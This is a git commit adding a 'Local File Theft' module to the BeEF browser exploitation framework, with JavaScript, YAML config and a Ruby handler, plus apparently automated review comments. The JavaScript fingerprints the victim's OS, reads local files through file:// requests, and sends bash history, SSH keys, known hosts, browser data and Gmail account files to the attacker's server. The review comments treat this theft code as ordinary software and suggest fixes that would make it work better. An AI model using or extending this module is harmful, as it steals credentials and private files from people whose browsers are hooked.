added local file theft module

This commit is contained in:
Mike Haworth
2012-01-20 23:14:38 +13:00
parent 7478a2fe9d
commit ee1f4df1ea
3 changed files with 239 additions and 0 deletions


@@ -0,0 +1,212 @@
// local_file_theft
//
// Shamelessly plagurised from kos.io/xsspwn
beef.execute(function() {
result = '';
fileList = ['linux','mac','ios','android','windows']
fileList['linux']= {
// How do we discover users?
"discover" :'/etc/passwd',
// Okay, we found them, what do we pillage?
"post" :{
'bashHistory':'.bash_history',
'sshHosts':'.ssh/known_hosts',
'sshKeys':'.ssh/id_rsa.pub',
'firefoxProfiles':'.mozilla/firefox/profiles.ini',
'chromeBookmarks':'.config/chromium/Default/Bookmarks'
}
}
fileList['mac']= {
// How do we discover users?
"discover" :'/Library/Preferences/com.apple.loginwindow.plist',
// Okay, we found them, what do we pillage?
"post" :{
'bashHistory':'.bash_history',
'sshHosts':'.ssh/known_hosts',
'sshKeys':'.ssh/id_rsa.pub',
'firefoxProfiles':'.mozilla/firefox/profiles.ini',
'chromeBookmarks':'.config/chromium/Default/Bookmarks'
}
}
fileList['android']= {
// Instead of how, just figure out the currently in use appi
"discover" :'/proc/self/status',
// Okay, we found them, what do we pillage?
"post" :{
'browser_data':'/data/data/com.android.browser/databases/webview.db',
'browser_data2':'/data/data/com.android.browser/databases/browser.db',
'gmail_accounts':'/data/data/com.google.android.gm/shared_prefs/Gmail.xml',
'dolpin_data':'/data/data/mobi.mgeek.TunnyBrowser/databases/webview.db',
'dolpin_data2':'/data/data/mobi.mgeek.TunnyBrowser/databases/browser.db',
'chromeBookmarks':'.config/chromium/Default/Bookmarks'
}
}
fileList['ios']= {
// WHAT IS THIS I DON'T EVEN
"discover" :'',
"post" :{
'iPadEtcHosts':'/etc/hosts'
}
}
fileList['windows']= {
// Meh, who cares
"discover" :'',
"post" :{
'bootini':'/c:/boot.ini',
'hosts':'/c:/WINDOWS/system32/drivers/etc/hosts'
}
}
functionList = {
mac:{
// OS X disovery
discover : function(){
tmp = new XMLHttpRequest()
tmp.open('get',"file:///"+fileList['mac']['discover'])
tmp.send()
tmp.onreadystatechange=function(){
if(tmp.readyState==4){
// TODO
// Understand plist format to _reliably_ pull out username with regex
//user = tmp.responseText.match(/\x03\x57(.*)\x12/)[1];
user = tmp.responseText.match(/\x54(.*)\x12\x01/)[1];
homedir = "/Users/"+user+"/";
grabFiles(homedir,"mac")
}
}
return true;
}
},
linux:{
// Linux username discovery
discover : function(){
tmp = new XMLHttpRequest()
tmp.open('get',"file:///"+fileList['linux']['discover'])
tmp.send()
tmp.onreadystatechange=function(){
if(tmp.readyState==4){
userDir = tmp.responseText.match(/[a-z0-9]*:x:[0-9]{4}:[0-9]{4}:[^:]*:([^:]*)/)[1];
homedir = userDir+"/";
grabFiles(homedir,"linux")
}
}
return true;
}
},
ios:{
// Grab ipad stuff
discover : function(){
tmp = new XMLHttpRequest()
tmp.open('get',fileList['ios']['discover'])
tmp.send()
tmp.onreadystatechange=function(){
if(tmp.readyState==4){
homedir = "file:///";
grabFiles(homedir,"ios")
}
}
alert("ipad")
}
},
android:{
// figure out what app (gmail, browser, or dolphin?) android
discover : function(){
//document.location="http://kos.io/"
tmp = new XMLHttpRequest()
tmp.open('get',fileList['android']['discover'])
tmp.send()
tmp.onreadystatechange=function(){
if(tmp.readyState==4){
if(/.*android\.gm.*/.test(tmp.responseText)){
document.location="http://kos.io/gmail"
} else if(/.*android\.browser.*/.test(tmp.responseText)){
document.location="http://kos.io/browser"
} else if(/.*ek\.TunnyBrowser.*/.test(tmp.responseText)){
document.location="http://kos.io/dolphin"
}
grabFiles("/","android")
}
}
return true;
}
}
}
function identify(){
if(/.*Android.*/.test(navigator.userAgent)){
return "android"
} else if(/Linux.*/i.test(navigator.platform)){
return "linux"
} else if(/iP.*/i.test(navigator.platform)){
return "ios"
} else if(/.*Mac.*/i.test(navigator.userAgent)){
return "mac"
} else if(/.*Windows.*/i.test(navigator.userAgent)){
return "windows"
} else if(/.*hpwOS.*/i.test(navigator.platform)){
return "webos"
}
}
function discoverUsers(os){
return functionList[os]['discover']()
}
function grabFiles(dir,os){
tmpfile = {}
for (i in fileList[os]['post']){
console.log('dir = ' + dir);
console.log('fileList: ' + fileList[os]['post'][i]);
console.log(i);
tmpfile[i] = new XMLHttpRequest()
tmpfile[i].open ('get',dir+"/"+fileList[os]['post'][i]);
tmpfile[i].send();
tmpfile[i].onreadystatechange=function(){
for (j in fileList[os]['post']){
if(tmpfile[j].readyState==4){
console.log('new returned for: ' + j);
result = j +": "+ tmpfile[j].responseText;
beef.net.send("<%= @command_url %>", <%= @command_id %>, 'result='+result);
}
}
}
}
}
discoverUsers(identify());
});
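Review bot: `fileList` on line 18 is created as an Array literal and then given string-keyed properties, and every other name in the callback (`result`, `tmp`, `user`, `homedir`, `tmpfile`, `i`, `j`) is assigned without `var`, so all of them become globals on the hooked page and the one shared `tmp` is overwritten if `discover` runs more than once. Declare them locally: `var fileList = {};` on line 18, `var result = '';` on line 17, and `var tmp = new XMLHttpRequest();` at the top of each `discover`. The loop variables in `grabFiles` need the same treatment (`for (var i in fileList[os]['post'])`), since the `onreadystatechange` closure on line 172 otherwise reads `i`/`j` from page scope. A short header comment saying that the module only has an effect when the hook page itself was loaded from a `file://` origin would also help, because nothing in the code checks that precondition.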


@@ -0,0 +1,14 @@
# local_file_theft
#
# Shamelessly plagurised from kos.io/xsspwn
beef:
module:
local_file_theft:
enable: true
category: "Misc"
name: "Local File Theft"
description: "Javascript may have filesystem access if we are running from a local resource and using the file:// scheme, this module checks common locations and cheekily snaches anything it finds. Shameless plagurised from kos.io/xsspwn. To test this module save the beefhook page locally and open in safari from the your localfile system"
authors: ["mh"]
target:
working: ["All"]
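Review bot: `working: ["All"]` on line 201 overstates what the description on line 198 says the module needs — the page has to be loaded over `file://` and the only test instruction names Safari — so the module will presumably be listed as working in every hooked browser regardless of origin. Either narrow the target list to what was actually tested, or state the `file://` precondition in the description as a limitation rather than as a testing tip. The description also carries typos that the operator will read: `plagurised` → `plagiarised`, `snaches` → `snatches`, `from the your localfile system` → `from your local filesystem`.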


@@ -0,0 +1,13 @@
# local_file_theft
#
# Shamelessly plagurised from kos.io/xsspwn
class Local_file_theft < BeEF::Core::Command
def post_execute
content = {}
content['result'] = @datastore['result']
save content
end
end
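Review bot: `post_execute` saves `@datastore['result']` exactly as the hooked browser posted it, with no check that the key is present, so a callback arriving without a `result` parameter stores a row with a nil value; a guard such as `return unless @datastore['result']` before the save would avoid that, assuming `save` does not already discard empty content. The three-line hash build can be a single literal, `save('result' => @datastore['result'])`. Because the stored value is raw file content from an untrusted client, whatever renders it in the console must escape it — that code is outside this commit, so this is only a point to confirm.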